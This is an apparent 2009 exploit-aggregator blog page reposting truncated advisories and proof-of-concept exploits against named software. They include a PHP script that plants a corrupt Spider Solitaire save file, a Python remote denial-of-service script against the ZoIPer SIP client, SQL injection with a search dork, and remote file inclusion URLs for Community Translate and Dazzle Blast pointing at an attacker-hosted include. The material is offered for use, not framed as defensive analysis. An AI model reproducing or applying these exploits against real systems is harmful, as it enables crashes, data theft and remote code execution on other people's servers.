Thursday, October 15, 2009

Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

<?php
/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file(spider.sav) will result in a local crash
of Spider Solitaire
*/
$username="pwn"; //Replace with your computer username
$file="spider.sav";
$junk="Spider Solitaire Local Crash";
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle,$junk);
fclose($handle);
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";
if(!copy($file,$file2))
{
    die("Can't copy file");
}
else
{
    echo "File succesfully...

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python
# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09
import sys
import socket
import os
def main(argc , argv):
    if len(sys.argv) != 2:
        os.system("cls")
        sys.exit("Usage: " + sys.argv[0] + " \n")
    target_host = sys.argv[1]
    target_port = 5060
...

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 06.08.2009
Risk: High
Affected Software:
- - PHP 5.3.0
- - PHP 5.2.10
Original URL:
http://securityreason.com/achievement_securityalert/65
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically...

playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]
Download: http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]
file: /lib/function.php
// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php";...

Sunday, October 4, 2009

jasakom has been hacked

...

Redcat Media SQL Injection Vulnerability

[x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]
| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 October 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc
[x]==========================================[x]
| Dork : “Powered...

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion Vulnerability
Software : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");
include/functions.php
[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0...

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');
admin/includes/createemails.php
[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0...
